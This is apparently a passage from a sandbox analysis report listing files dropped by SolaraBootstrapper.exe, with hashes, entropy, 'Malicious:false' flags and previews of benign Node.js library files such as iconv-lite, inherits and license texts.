                                                  SSDEEP:768:R69o3X4Rf9i7bwjpM+aweZjh8WcwLhYQB4nbwjTfjPMvTD3gFWCXxDJK98:4o3XK1i/Ay+aDZ4ChpBuorjk3IXxDJC8
                                                  MD5:15D09686CE9E9BA80B3014D3161E2E7E
                                                  SHA1:33AD3790A0660CD2B7C0C599A7F5D3C147596BEC
                                                  SHA-256:99E2114DC4B39092617967C763F9EAEB4D8E70551AFC5884BAA3FB92827F3420
                                                  SHA-512:6008770D8E8FCE0F18B1C5F2BC37B51908ECC75FC50D629AA505713FF5E8A934F5F9571703822DF0D22D3B6777B4192B727005E76CCEB578135A41B46C2FDE62
                                                  Malicious:false
                                                  Preview:[.["0","\u0000",127],.["a140","..............................................................."],.["a1a1","..............................................................",4,"............................"],.["a240","...................................",7,"....................."],.["a2a1","...............",9,".",9,".",8,"....",25,".",21],.["a340",".....",16,".",6,".",16,".",6,".",10],.["a3a1",".",25,"....."],.["a3e1","."],.["a440","..............................
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):41064
                                                  Entropy (8bit):6.013263121353981
                                                  Encrypted:false
                                                  SSDEEP:768:WMC+35C36zZTSrW9QrABsFntp6dFW+uf0IlE50bOfoYZnkeNt9KPRr1:WMC+35C3kuW9uABOtMy0Iu50bOGeERr1
                                                  MD5:98D5CF16FC6B791A0B2C829339766D16
                                                  SHA1:9BEB6AFA39229A044FD6935A92CA5E997F6FAC78
                                                  SHA-256:7C4FE279000F7E99FC7CD59AFB1DA21725DCEBDC1BABD9E3B883253A77ABB042
                                                  SHA-512:1A923573B2D41EE7AB42BF6CD21BD17D04B8F0DFE2EBA7419000B2768BB5693C8ED5A32171A9F4E382981368C582C8409CD32A4E1067A4D4D47635C127A042C0
                                                  Malicious:false
                                                  Preview:[.["0","\u0000",127],.["8ea1",".",62],.["a1a1","..................................................",9,"..................................."],.["a2a1",".............."],.["a2ba","........"],.["a2ca","......."],.["a2dc","..............."],.["a2f2","........"],.["a2fe","."],.["a3b0",".",9],.["a3c1",".",25],.["a3e1",".",25],.["a4a1",".",82],.["a5a1",".",85],.["a6a1",".",16,".",6],.["a6c1",".",16,".",6],.["a7a1",".",5,"..",25],.["a7d1",".",5,"..",25],.["a8a1","................................"],.["ada1",".",19,".",9],.["adc0","......................."],.["addf",".......",4,"..
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):2216
                                                  Entropy (8bit):3.4322567660280536
                                                  Encrypted:false
                                                  SSDEEP:48:Y7U0CyxAMT6nlPZJ5kHK6TC74MUxUULKqXJU0X2VLO/wt2J8QbK:f0p2JGq6O7KK6XBYp
                                                  MD5:4FBEC8C88ACBB1EF60A5AEBF9E8E719B
                                                  SHA1:BFCE88FC92E98C19910FBEF1B02B85FB5D2CF2F9
                                                  SHA-256:5A3CC11E38F05A0908442ACBF1C921D0B73F2A304FB6A9E4484E26EB1CA07D76
                                                  SHA-512:B57A454D71E4F01D49ADC606A5C6AB5616869C54F0C3F9C30B80E7EF13A67246E9DFA5AACA06E96B0A76004CCFCA180175825141BB2A7366E65E8F7E443A43DA
                                                  Malicious:false
                                                  Preview:{"uChars":[128,165,169,178,184,216,226,235,238,244,248,251,253,258,276,284,300,325,329,334,364,463,465,467,469,471,473,475,477,506,594,610,712,716,730,930,938,962,970,1026,1104,1106,8209,8215,8218,8222,8231,8241,8244,8246,8252,8365,8452,8454,8458,8471,8482,8556,8570,8596,8602,8713,8720,8722,8726,8731,8737,8740,8742,8748,8751,8760,8766,8777,8781,8787,8802,8808,8816,8854,8858,8870,8896,8979,9322,9372,9548,9588,9616,9622,9634,9652,9662,9672,9676,9680,9702,9735,9738,9793,9795,11906,11909,11913,11917,11928,11944,11947,11951,11956,11960,11964,11979,12284,12292,12312,12319,12330,12351,12436,12447,12535,12543,12586,12842,12850,12964,13200,13215,13218,13253,13263,13267,13270,13384,13428,13727,13839,13851,14617,14703,14801,14816,14964,15183,15471,15585,16471,16736,17208,17325,17330,17374,17623,17997,18018,18212,18218,18301,18318,18760,18811,18814,18820,18823,18844,18848,18872,19576,19620,19738,19887,40870,59244,59336,59367,59413,59417,59423,59431,59437,59443,59452,59460,59478,59493,63789,63866,6
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):1227
                                                  Entropy (8bit):5.044163479878134
                                                  Encrypted:false
                                                  SSDEEP:24:rKb78DifMioZMYxTChDzC98DpFciYKl6n6ES1L8JaxbtaXuAXGEu984zEb2YLBG9:wfMrreh3CIxdl66XraXN6Y1GHt/dii
                                                  MD5:EF78BD5DAB20DAF8C2BB6C34E5B66BFF
                                                  SHA1:918EECCA2F76DB2AA3FE0BF8634816584BF31D78
                                                  SHA-256:7E6E8C23D37D5819481909E4D972FBF0F35E120DDA3498DD3A0CD6B5E4932FE6
                                                  SHA-512:3B8E3C567C5A6B538B9CFC57C199E6900D9CFDC543CFCDFCF0CD43C93E2D031CB7132067F936136E35862ADECA7DB3B2AF926F0ACD0433F22B0DCC6F90FA762F
                                                  Malicious:false
                                                  Preview:[.["a140",".",62],.["a180",".",32],.["a240",".",62],.["a280",".",32],.["a2ab",".",5],.["a2e3",".."],.["a2ef",".."],.["a2fd",".."],.["a340",".",62],.["a380",".",31,"."],.["a440",".",62],.["a480",".",32],.["a4f4",".",10],.["a540",".",62],.["a580",".",32],.["a5f7",".",7],.["a640",".",62],.["a680",".",32],.["a6b9",".",7],.["a6d9",".",6],.["a6ec",".."],.["a6f3","."],.["a6f6",".",8],.["a740",".",62],.["a780",".",32],.["a7c2",".",14],.["a7f2",".",12],.["a896",".",10],.["a8bc","."],.["a8bf","."],.["a8c1","...."],.["a8ea",".",20],.["a958","."],.["a95b","."],.["a95d","..."],.["a989","..",11],.["a997",".",12],.["a9f0",".",14],.["aaa1",".",93],.["aba1",".",93],.["aca1",".",93],.["ada1",".",93],.["aea1",".",93],.["afa1",".",93],.["d7fa",".",4],.["f8a1",".",93],.["f9a1",".",93],.["faa1",".",93],.["fba1",".",93],.["fca1",".",93],.["fda1",".",93],.["fe50","........
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):23782
                                                  Entropy (8bit):6.017531553224289
                                                  Encrypted:false
                                                  SSDEEP:384:OcKDbyVNOvQLWFycfjdVjI6VN2kW1cOxdYNjL7UujgTDE/gTD8:dKDbGMFFbZhb/IcOxgjPUPVQ
                                                  MD5:6D542FFDF3409FD2E8BD01247777B6F7
                                                  SHA1:E02D26E47A7B295222C3CA70015024CA163E7381
                                                  SHA-256:02B0B120F697C48133E8B547E8DC594BC5B9F1C1799B50C2C5FF917298548558
                                                  SHA-512:E02449D3561A4D3856C981FCC350D0836BA3E55C82DD96585E055F6E16DCFD2C1D3ECE44CF473F55924301A1143F66DD372793EDD13BA30254B2944657A3841C
                                                  Malicious:false
                                                  Preview:[.["0","\u0000",128],.["a1",".",62],.["8140","..................................................",9,"...."],.["8180","............................................."],.["81b8","........"],.["81c8","......."],.["81da","..............."],.["81f0","........"],.["81fc","."],.["824f",".",9],.["8260",".",25],.["8281",".",25],.["829f",".",82],.["8340",".",62],.["8380",".",22],.["839f",".",16,".",6],.["83bf",".",16,".",6],.["8440",".",5,"..",25],.["8470",".",5,"..",7],.["8480",".",17],.["849f","................................"],.["8740",".",19,".",9],.["875f","......................."],.["877e"
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):5011
                                                  Entropy (8bit):4.8640960255878305
                                                  Encrypted:false
                                                  SSDEEP:96:x+reLQ49gZBccQSYQ51s1oZQlp0cERXW8dTJn8:zLQ49g5YQ5WoZQlSdRXnn8
                                                  MD5:7AD12158AF65189B85796DE64923F031
                                                  SHA1:D3C63CE106659F00D6F2DBB40BA4DC853FBC8703
                                                  SHA-256:BAF708BE438EDF0FEF70A3E34619C6BE94CD53D963ACB9B2542419D5FC3BB8C8
                                                  SHA-512:1E1B9E3FC3AA08BF48F14DE442706E14A0B0CEBE0B55575E3796BA3B7CE717D8DF7DDE1D3FF3F0F3C92997C438FB68E6A43BC15A60541AF659EA2324414D26EE
                                                  Malicious:false
                                                  Preview:"use strict";.var Buffer = require("safer-buffer").Buffer;..// Note: UTF16-LE (or UCS2) codec is Node.js native. See encodings/internal.js..// == UTF16-BE codec. ==========================================================..exports.utf16be = Utf16BECodec;.function Utf16BECodec() {.}..Utf16BECodec.prototype.encoder = Utf16BEEncoder;.Utf16BECodec.prototype.decoder = Utf16BEDecoder;.Utf16BECodec.prototype.bomAware = true;...// -- Encoding..function Utf16BEEncoder() {.}..Utf16BEEncoder.prototype.write = function(str) {. var buf = Buffer.from(str, 'ucs2');. for (var i = 0; i < buf.length; i += 2) {. var tmp = buf[i]; buf[i] = buf[i+1]; buf[i+1] = tmp;. }. return buf;.}..Utf16BEEncoder.prototype.end = function() {.}...// -- Decoding..function Utf16BEDecoder() {. this.overflowByte = -1;.}..Utf16BEDecoder.prototype.write = function(buf) {. if (buf.length == 0). return '';.. var buf2 = Buffer.alloc(buf.length + 1),. i = 0, j = 0;.. if (this.overflowByt
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):9215
                                                  Entropy (8bit):4.79983678990615
                                                  Encrypted:false
                                                  SSDEEP:192:kh8t8oEywQ+OpVwnHLj9ZiK/Cyb6Mu0qB8k5yXwe+a:Ae8wHCnHLj69QqB7eT
                                                  MD5:CF6746C76930FE21A716EF03D700B208
                                                  SHA1:5DACC76C685AEDA5C4890D5F8D8E7AABDD852161
                                                  SHA-256:C814AD268D19265CCAFC9F7BBA2E8DFCDD2AFDEA62698BB24B7284B3F2EA18A0
                                                  SHA-512:A65BFF8CDF7A8EEEE08F4883FC81138019E3D500A3031C869491C13EB54E218881E8EAD2417DA3178743B367B2938ED7AE13803E6CD18011D7A339ED81DA66D3
                                                  Malicious:false
                                                  Preview:"use strict";.var Buffer = require("safer-buffer").Buffer;..// UTF-7 codec, according to https://tools.ietf.org/html/rfc2152.// See also below a UTF-7-IMAP codec, according to http://tools.ietf.org/html/rfc3501#section-5.1.3..exports.utf7 = Utf7Codec;.exports.unicode11utf7 = 'utf7'; // Alias UNICODE-1-1-UTF-7.function Utf7Codec(codecOptions, iconv) {. this.iconv = iconv;.};..Utf7Codec.prototype.encoder = Utf7Encoder;.Utf7Codec.prototype.decoder = Utf7Decoder;.Utf7Codec.prototype.bomAware = true;...// -- Encoding..var nonDirectChars = /[^A-Za-z0-9'\(\),-\.\/:\? \n\r\t]+/g;..function Utf7Encoder(options, codec) {. this.iconv = codec.iconv;.}..Utf7Encoder.prototype.write = function(str) {. // Naive implementation.. // Non-direct chars are encoded as "+<base64>-"; single "+" char is encoded as "+-".. return Buffer.from(str.replace(nonDirectChars, function(chunk) {. return "+" + (chunk === '+' ? '' : . this.iconv.encode(chunk, 'utf16-be').toString('base64').
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1109
                                                  Entropy (8bit):4.6422103165542135
                                                  Encrypted:false
                                                  SSDEEP:24:vV55erOVEJPASyl6ZSQtNOovWmzkALvNF8lG8:vVberOVEdASyl6ZVtNOKWmzkAZ2lG8
                                                  MD5:7B3D4519F05BF0CC8D70A4D950C72C55
                                                  SHA1:5C6518CE3ACC35C3E1DA961BC02C110E08F81DB2
                                                  SHA-256:C230D25D8E7FBB50960C634B636B71327C409E9A77E67FE9446B566BDCEA362D
                                                  SHA-512:BD62DF0406AF2F67D45FC418FAEC70D6D63F58112704CFDF9A28BC633696043554A09048E69ABBB4E3DDE653D85F9D64E9D0D5C0117C7D9D404914DA5323FC07
                                                  Malicious:false
                                                  Preview:"use strict";..var BOMChar = '\uFEFF';..exports.PrependBOM = PrependBOMWrapper.function PrependBOMWrapper(encoder, options) {. this.encoder = encoder;. this.addBOM = true;.}..PrependBOMWrapper.prototype.write = function(str) {. if (this.addBOM) {. str = BOMChar + str;. this.addBOM = false;. }.. return this.encoder.write(str);.}..PrependBOMWrapper.prototype.end = function() {. return this.encoder.end();.}...//------------------------------------------------------------------------------..exports.StripBOM = StripBOMWrapper;.function StripBOMWrapper(decoder, options) {. this.decoder = decoder;. this.pass = false;. this.options = options || {};.}..StripBOMWrapper.prototype.write = function(buf) {. var res = this.decoder.write(buf);. if (this.pass || !res). return res;.. if (res[0] === BOMChar) {. res = res.slice(1);. if (typeof this.options.stripBOM === 'function'). this.options.stripBOM();. }.. this.pa
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):8701
                                                  Entropy (8bit):4.405358507494983
                                                  Encrypted:false
                                                  SSDEEP:192:IbXxpx/xnhCuSCjPCdO/grhCu+uFopJpt:IrxpLnRvPCdLrR+TpN
                                                  MD5:24AC97737522B61C26B830D350CFCAEA
                                                  SHA1:850643AA226441C0D0D9913EA5362BB85543C26A
                                                  SHA-256:7B86AEBD7175D940C50F60EAC1981490962855D9723BF971981DDD703BA6AF43
                                                  SHA-512:237809B8FD38F594E583492E98D291FFD6EE44B5C94628615420B5D9DAF76F03B1619DDF77AC306FE7323530E2FA6346194866E7E165EAE90AE5075B2CAEB823
                                                  Malicious:false
                                                  Preview:"use strict";.var Buffer = require("buffer").Buffer;.// Note: not polyfilled with safer-buffer on a purpose, as overrides Buffer..// == Extend Node primitives to use iconv-lite =================================..module.exports = function (iconv) {. var original = undefined; // Place to keep original methods... // Node authors rewrote Buffer internals to make it compatible with. // Uint8Array and we cannot patch key functions since then.. // Note: this does use older Buffer API on a purpose. iconv.supportsNodeEncodingsExtension = !(Buffer.from || new Buffer(0) instanceof Uint8Array);.. iconv.extendNodeEncodings = function extendNodeEncodings() {. if (original) return;. original = {};.. if (!iconv.supportsNodeEncodingsExtension) {. console.error("ACTION NEEDED: require('iconv-lite').extendNodeEncodings() is not supported in your version of Node");. console.error("See more info at https://github.com/ashtuchkin/iconv-lite/wiki/No
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):982
                                                  Entropy (8bit):4.590684690057057
                                                  Encrypted:false
                                                  SSDEEP:12:U8UBFNMoa1zuuLpM3QXD2m6T2VaAWA6Q2F:VUDuoa1KkpM3QXSmCAz2F
                                                  MD5:083C701AD23D900AB019A2E094158898
                                                  SHA1:05C03C5E8EDDF1CDE570754D84084C33912BC40A
                                                  SHA-256:73AAEE6A7A9CF41FB2C67158F4BC218F9DA27545EA55648B2C10CA2A9600AE15
                                                  SHA-512:52EEB6DF35085A8EEA9374D1237B5CAD5C2D8EC1370B967E1A7A11B9AFD3C503AE01473E90BC5B5D70594E16096CF1B5CF1C21D556551AB2AC9FF416284C2E34
                                                  Malicious:false
                                                  Preview:/*---------------------------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Licensed under the MIT License.. * REQUIREMENT: This definition is dependent on the @types/node definition.. * Install with `npm install @types/node --save-dev`. *--------------------------------------------------------------------------------------------*/..declare module 'iconv-lite' {..export function decode(buffer: Buffer, encoding: string, options?: Options): string;...export function encode(content: string, encoding: string, options?: Options): Buffer;...export function encodingExists(encoding: string): boolean;...export function decodeStream(encoding: string, options?: Options): NodeJS.ReadWriteStream;...export function encodeStream(encoding: string, options?: Options): NodeJS.ReadWriteStream;.}..export interface Options {. stripBOM?: boolean;. addBOM?: boolean;. defaultEncoding?: string;.}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text
                                                  Category:dropped
                                                  Size (bytes):5123
                                                  Entropy (8bit):4.657971397606252
                                                  Encrypted:false
                                                  SSDEEP:96:wsWY5niEC/jgNGAPtbCnz1lrDVOlraCr3q14lYU5cO5FnTncbvf6yYi:QEiEajiLCzLrDCraMaal95jFngb3tYi
                                                  MD5:C1DA5B53FA60006BC973DC785BED2CA6
                                                  SHA1:68CCC5B53B1B7AA66DAE594AD3150B0F66D158A5
                                                  SHA-256:77D20E2FD5BCD9E324FB6CFDB909CD06FDAF6A91769ADFFCF4D7C4C066CCE4C3
                                                  SHA-512:8D8AC4E9119BBE1F9A8475EDBBFFBCB260D17EAC94BD5C0AB321D1012FCD0762786A449259355F25A10905BE18051CA494F120D0E826005BA33468B05CFC54F1
                                                  Malicious:false
                                                  Preview:"use strict";..// Some environments don't have global Buffer (e.g. React Native)..// Solution would be installing npm modules "buffer" and "stream" explicitly..var Buffer = require("safer-buffer").Buffer;..var bomHandling = require("./bom-handling"),. iconv = module.exports;..// All codecs and aliases are kept here, keyed by encoding name/alias..// They are lazy loaded in `iconv.getCodec` from `encodings/index.js`..iconv.encodings = null;..// Characters emitted in case of error..iconv.defaultCharUnicode = '.';.iconv.defaultCharSingleByte = '?';..// Public API..iconv.encode = function encode(str, encoding, options) {. str = "" + (str || ""); // Ensure string... var encoder = iconv.getEncoder(encoding, options);.. var res = encoder.write(str);. var trail = encoder.end();. . return (trail && trail.length > 0) ? Buffer.concat([res, trail]) : res;.}..iconv.decode = function decode(buf, encoding, options) {. if (typeof buf === 'string') {. if (!iconv.skipDeco
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):3387
                                                  Entropy (8bit):4.65128182240928
                                                  Encrypted:false
                                                  SSDEEP:48:HJtP7Zyw/iRzB3FHu+KGXB0kAli59qFDor1Gxr1EXCXkv:HJBZyw/kfO7GXB0kAlAg2wEXCXkv
                                                  MD5:8628E41438801C5BFDABF3BE9B1FF548
                                                  SHA1:3982C3E4C6ABE5EC4064A8C5196395067D0C504B
                                                  SHA-256:25A423EAF41F8DC6BC40CB28189A24E2D63B990ED72C824940BED55D0264EA6D
                                                  SHA-512:6BBB6C654B75A23E73343F2CBC8EB84AACB09A98E4E49A875689E75040333EDAAEBDC8649DA8399BC89532150DC1AA30F5F0FB07C1523C94A6CBA3817F33A88D
                                                  Malicious:false
                                                  Preview:"use strict";..var Buffer = require("buffer").Buffer,. Transform = require("stream").Transform;...// == Exports ==================================================================.module.exports = function(iconv) {. . // Additional Public API.. iconv.encodeStream = function encodeStream(encoding, options) {. return new IconvLiteEncoderStream(iconv.getEncoder(encoding, options), options);. }.. iconv.decodeStream = function decodeStream(encoding, options) {. return new IconvLiteDecoderStream(iconv.getDecoder(encoding, options), options);. }.. iconv.supportsStreams = true;... // Not published yet.. iconv.IconvLiteEncoderStream = IconvLiteEncoderStream;. iconv.IconvLiteDecoderStream = IconvLiteDecoderStream;. iconv._collect = IconvLiteDecoderStream.prototype.collect;.};...// == Encoder stream =======================================================.function IconvLiteEncoderStream(conv, options) {. this.conv = conv;. options = options ||
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):1227
                                                  Entropy (8bit):4.440470725760903
                                                  Encrypted:false
                                                  SSDEEP:24:Z31+2MQ9bjb9k2rPA9/0KcdUoLWUailRAlK:ZF+2MWhRu0KoLRRp
                                                  MD5:A8B97F25878DDC5419A9AFE173037035
                                                  SHA1:A1E76EDB6428E44345ED3851FF7AF5D850434CF5
                                                  SHA-256:6F7C96C32F7D6E0498BE71B0CCEDAF298BB00AB4DD40C1D63655EC53477DB384
                                                  SHA-512:ADEB2C6AA4710ED983471A3C4485F50BC5E0DA9ED28331E0D768FB23C3F2239A15C04CFAB848CC00A56786425CEE50CAE18A76FB2DB3EF27A34797782A131B4C
                                                  Malicious:false
                                                  Preview:{. "name": "iconv-lite",. "description": "Convert character encodings in pure javascript.",. "version": "0.4.24",. "license": "MIT",. "keywords": [. "iconv",. "convert",. "charset",. "icu". ],. "author": "Alexander Shtuchkin <ashtuchkin@gmail.com>",. "main": "./lib/index.js",. "typings": "./lib/index.d.ts",. "homepage": "https://github.com/ashtuchkin/iconv-lite",. "bugs": "https://github.com/ashtuchkin/iconv-lite/issues",. "repository": {. "type": "git",. "url": "git://github.com/ashtuchkin/iconv-lite.git". },. "engines": {. "node": ">=0.10.0". },. "scripts": {. "coverage": "istanbul cover _mocha -- --grep .",. "coverage-open": "open coverage/lcov-report/index.html",. "test": "mocha --reporter spec --grep .". },. "browser": {. "./lib/extend-node": false,. "./lib/streams": false. },. "devDependencies": {. "mocha": "^3.1.0",. "reque
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):749
                                                  Entropy (8bit):4.988275613873547
                                                  Encrypted:false
                                                  SSDEEP:12:9FM9ZFICS4dCPXeTbbtLgmq6KX9KsA8ZXs1HUtA3+djz2AvPNj2M3khFLCgK2P/d:9SZFCICCtEmq6s9imgyc2jZ63ew/ea
                                                  MD5:5B2EF2247AF6D355AE9D9F988092D470
                                                  SHA1:3B0E8D58A362B1787EF3504FBA4F593B22F3CEE4
                                                  SHA-256:5FFE28E7ADE7D8F10D85D5337A73FD793DAC5C462FB9A28FBF8C5046C7FBCA3B
                                                  SHA-512:6159FE6970CDB729DCC363BFE834924A6CDED6D4AA585F965E6D58B65C54D5E198A69B3C7D4E733964A3C1542A45808016D816CD89AC3919671C601BD2ED9785
                                                  Malicious:false
                                                  Preview:The ISC License..Copyright (c) Isaac Z. Schlueter..Permission to use, copy, modify, and/or distribute this software for any.purpose with or without fee is hereby granted, provided that the above.copyright notice and this permission notice appear in all copies...THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH.REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND.FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,.INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM.LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR.OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR.PERFORMANCE OF THIS SOFTWARE...
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1625
                                                  Entropy (8bit):4.668804266106524
                                                  Encrypted:false
                                                  SSDEEP:48:f0fSSxMiA174YSR5Z3Sj5IpaRu8wDJHOqQlc:fSSSjAPepn1Zj
                                                  MD5:DE7EAB94959B05C9765CAD499AB092DB
                                                  SHA1:F2F8D26F1CF5FB1E3A68AA225221B064F999FEFB
                                                  SHA-256:B33C8BE1CA837D9E4C9B0E04A550FEACBC101556164D3CDBB875AED6CCBB8A29
                                                  SHA-512:1DBA8A8AAC506A71DA9869349D64AD1E83362690E5B11A6B0EE73E6A2019A7DBAED452654029CE641254D1BDE3B3D3E4BBB0FD31360846B8CFD01DCD25793597
                                                  Malicious:false
                                                  Preview:Browser-friendly inheritance fully compatible with standard node.js.[inherits](http://nodejs.org/api/util.html#util_util_inherits_constructor_superconstructor)...This package exports standard `inherits` from node.js `util` module in.node environment, but also provides alternative browser-friendly.implementation through [browser.field](https://gist.github.com/shtylman/4339901). Alternative.implementation is a literal copy of standard one located in standalone.module to avoid requiring of `util`. It also has a shim for old.browsers with no `Object.create` support...While keeping you sure you are using standard `inherits`.implementation in node.js environment, it allows bundlers such as.[browserify](https://github.com/substack/node-browserify) to not.include full `util` package to your client code if all you need is.just `inherits` function. It worth, because browser shim for `util`.package is large and `inherits` is often the single function you need.from it...It's recommended to use thi
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):250
                                                  Entropy (8bit):4.647106694152876
                                                  Encrypted:false
                                                  SSDEEP:6:jvQfk0dRFcMz+NPZqXAXEd/BBNCl0dRFcIKBBB5g:jwBRFcFxZXERBBIqRFc3BBB5g
                                                  MD5:9CED637189714B8D21D34AEB50B42AE8
                                                  SHA1:222DA288A07D8F65B2AED9B88815948CFE0B42D9
                                                  SHA-256:BB380F32BEF5FEB18678F0F45F88073FED5D7A0069A309132CB2080CD553D5C7
                                                  SHA-512:59925A20877C9193308E6766B96C11B6D910B45583C73498B8761B091231BCE2F4F7D95EB7D2B2E83D6B8A595689B80878C27E7C1E87347BA03F6CCB0C945CD1
                                                  Malicious:false
                                                  Preview:try {. var util = require('util');. /* istanbul ignore next */. if (typeof util.inherits !== 'function') throw '';. module.exports = util.inherits;.} catch (e) {. /* istanbul ignore next */. module.exports = require('./inherits_browser.js');.}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):753
                                                  Entropy (8bit):4.269212982212497
                                                  Encrypted:false
                                                  SSDEEP:12:FwaHkcBI0mcMpdgfIFDIxpuFqR/urhzBI0mchBr4wPog:mykcBIe0dUcyKqR/8hzBIeLr4c
                                                  MD5:184872B18B759A37285BEE13CD1CD0E4
                                                  SHA1:70FCF71F449139ECBF7A5D6C78ECE069BBDF4DC3
                                                  SHA-256:AD322A7B1DEC60F3D2EBDA2091816469EFB55B567D241CF3CF0FA4C5A4AFE500
                                                  SHA-512:0B6F853387D1AD11BC77997F278F2503CE921A5F7049978BF60B63A1E9A772238EBEF67808C2132F35D6A198CB6432EB43B15769FF420B8DB64959CD0A9E50CF
                                                  Malicious:false
                                                  Preview:if (typeof Object.create === 'function') {. // implementation from standard node.js 'util' module. module.exports = function inherits(ctor, superCtor) {. if (superCtor) {. ctor.super_ = superCtor. ctor.prototype = Object.create(superCtor.prototype, {. constructor: {. value: ctor,. enumerable: false,. writable: true,. configurable: true. }. }). }. };.} else {. // old school shim for old browsers. module.exports = function inherits(ctor, superCtor) {. if (superCtor) {. ctor.super_ = superCtor. var TempCtor = function () {}. TempCtor.prototype = superCtor.prototype. ctor.prototype = new TempCtor(). ctor.prototype.constructor = ctor. }. }.}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):581
                                                  Entropy (8bit):4.517825583313142
                                                  Encrypted:false
                                                  SSDEEP:12:d+S0Gi1e0chjDFvFC5aUXqF02s4Vl0UJk/paa:dd0v1QJDFvM5aw3/US
                                                  MD5:F73908DAB55D4259F3ED052CE9FB2FBB
                                                  SHA1:62B11DD736A0047FBD8D2DC0406D2118A549A359
                                                  SHA-256:BE645800BC94FD8DE29C8AE91690549B316CC437100108AEEA7B2F347693CC80
                                                  SHA-512:470B2FFBCBCAFB423D46C724D046B6471A7847F6C8A97158F4C22D26F429655BB40F3962026F7935741DDA6ED5E6449FB942537F610DF13D20892C5B6BB14A9D
                                                  Malicious:false
                                                  Preview:{. "name": "inherits",. "description": "Browser-friendly inheritance fully compatible with standard node.js inherits()",. "version": "2.0.4",. "keywords": [. "inheritance",. "class",. "klass",. "oop",. "object-oriented",. "inherits",. "browser",. "browserify". ],. "main": "./inherits.js",. "browser": "./inherits_browser.js",. "repository": "git://github.com/isaacs/inherits",. "license": "ISC",. "scripts": {. "test": "tap". },. "devDependencies": {. "tap": "^14.2.4". },. "files": [. "inherits.js",. "inherits_browser.js". ].}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1087
                                                  Entropy (8bit):5.1673488390303035
                                                  Encrypted:false
                                                  SSDEEP:24:osvh3rmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:ospaJHlxE35QHOs5exm3ogF5n
                                                  MD5:88F60A4B6E44CB849B5D907A7664C0EF
                                                  SHA1:8C56B998D6016165B0A399D2736BE98EF2AD1C62
                                                  SHA-256:62568A2D1337B77171ECCA9DB10579163446DE1BA6151678E81F06CDC199971B
                                                  SHA-512:BED03823BF97F0F56FCCD3092938367F974BB4EBC3F3828EC6C1C430F7F7D374E7B7F5C49F633320D1565102C75CCDF280877B6B769CF608BA5BB7A79D04FEC9
                                                  Malicious:false
                                                  Preview:Copyright (C) 2011-2017 whitequark <whitequark@whitequark.org>..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.O
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (314)
                                                  Category:dropped
